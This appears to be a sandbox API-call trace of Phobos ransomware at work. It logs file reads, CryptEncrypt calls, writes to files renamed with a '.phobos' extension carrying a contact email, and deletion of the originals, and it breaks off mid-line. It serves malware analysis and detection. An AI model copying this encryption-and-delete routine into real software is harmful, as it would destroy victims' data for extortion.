GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\3UWU5dw.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\3uwu5dw.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\3UWU5dw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\3uwu5dw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.988] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.988] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\3UWU5dw.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\3uwu5dw.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.000] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0198.000] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.000] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13368, lpOverlapped=0x0) returned 1 [0198.001] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13370, dwBufLen=0x13370 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13370) returned 1 [0198.002] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x13370, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x13370, lpOverlapped=0x0) returned 1 [0198.004] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0198.004] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.004] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.004] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.004] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.004] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.004] CloseHandle (hObject=0x160) returned 1 [0198.004] CloseHandle (hObject=0x174) returned 1 [0198.004] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\3UWU5dw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\3uwu5dw.m4a")) returned 1 [0198.006] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\6Qn5uwUtApa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\6qn5uwutapa.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.006] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=76093) returned 1 [0198.006] CloseHandle (hObject=0x174) returned 1 [0198.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\6Qn5uwUtApa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\6qn5uwutapa.m4a")) returned 0x20 [0198.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\6Qn5uwUtApa.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\6qn5uwutapa.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\6Qn5uwUtApa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\6qn5uwutapa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.007] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.007] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\6Qn5uwUtApa.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\6qn5uwutapa.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.007] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0198.007] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.007] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1293d, lpOverlapped=0x0) returned 1 [0198.009] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12940, dwBufLen=0x12940 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x12940) returned 1 [0198.009] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x12940, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x12940, lpOverlapped=0x0) returned 1 [0198.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0198.011] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.011] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.011] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.011] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.011] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.011] CloseHandle (hObject=0x174) returned 1 [0198.011] CloseHandle (hObject=0x160) returned 1 [0198.011] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\6Qn5uwUtApa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\6qn5uwutapa.m4a")) returned 1 [0198.012] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\blTmFC8O.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\bltmfc8o.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.014] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=13063) returned 1 [0198.014] CloseHandle (hObject=0x160) returned 1 [0198.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\blTmFC8O.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\bltmfc8o.mp3")) returned 0x20 [0198.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\blTmFC8O.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\bltmfc8o.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\blTmFC8O.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\bltmfc8o.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.014] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.014] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\blTmFC8O.mp3.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\bltmfc8o.mp3.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.015] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0198.015] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.015] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3307, lpOverlapped=0x0) returned 1 [0198.016] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3310, dwBufLen=0x3310 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3310) returned 1 [0198.016] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3310, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3310, lpOverlapped=0x0) returned 1 [0198.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0198.017] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.017] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.017] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.017] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.018] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.018] CloseHandle (hObject=0x160) returned 1 [0198.018] CloseHandle (hObject=0x174) returned 1 [0198.018] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\blTmFC8O.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\bltmfc8o.mp3")) returned 1 [0198.019] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\oM2L6kWv9kWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\om2l6kwv9kwp.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.019] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=36286) returned 1 [0198.019] CloseHandle (hObject=0x174) returned 1 [0198.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\oM2L6kWv9kWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\om2l6kwv9kwp.m4a")) returned 0x20 [0198.019] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\oM2L6kWv9kWp.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\om2l6kwv9kwp.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\oM2L6kWv9kWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\om2l6kwv9kwp.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.020] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.020] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\oM2L6kWv9kWp.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\om2l6kwv9kwp.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.022] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0198.023] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.023] ReadFile (in: hFile=0x174, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x8dbe, lpOverlapped=0x0) returned 1 [0198.024] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8dc0, dwBufLen=0x8dc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x8dc0) returned 1 [0198.024] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x8dc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x8dc0, lpOverlapped=0x0) returned 1 [0198.025] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ca8) returned 1 [0198.025] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.025] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0198.025] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.025] WriteFile (in: hFile=0x160, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0198.025] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.026] CloseHandle (hObject=0x174) returned 1 [0198.026] CloseHandle (hObject=0x160) returned 1 [0198.026] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\oM2L6kWv9kWp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\om2l6kwv9kwp.m4a")) returned 1 [0198.028] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\QVueIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\qvueie.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.028] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=92713) returned 1 [0198.028] CloseHandle (hObject=0x160) returned 1 [0198.028] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\QVueIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\qvueie.m4a")) returned 0x20 [0198.029] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\QVueIe.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\qvueie.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\QVueIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\qvueie.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0198.029] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.029] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0198.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\QVueIe.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\qvueie.m4a.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0198.029] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.029] ReadFile (in: hFile=0x160, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x16a29, lpOverlapped=0x0) returned 1 [0198.031] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16a30, dwBufLen=0x16a30 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x16a30) returned 1 [0198.031] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x16a30, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x16a30, lpOverlapped=0x0) returned 1 [0198.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ce8) returned 1 [0198.289] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0198.289] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0198.289] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0198.289] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0198.290] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.290] CloseHandle (hObject=0x160) returned 1 [0198.290] CloseHandle (hObject=0x174) returned 1 [0198.290] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HKLcdpGkbvv2YoBm\\QVueIe.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hklcdpgkbvv2yobm\\qvueie.m4a")) returned 1 [0198.291] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0198.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\qAm3eXzbu1xQwk145.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\qam3exzbu1xqwk145.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0198.303] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10255) returned 1 [0198.303] CloseHandle (hObject=0x174) returned 1 [0198.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\qAm3eXzbu1xQwk145.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc h\\dsjnb7ywzxxdm9r\\frerav8z-gjuttni\\qam3exzbu1xqwk145.m4a")) returned 0x20 [0198.303] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VplYC h\\DSJNb7yWzXXdM9R\\FrerAV8Z-gjuttNi\\qAm3eXzbu1xQwk145.m4a.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vplyc 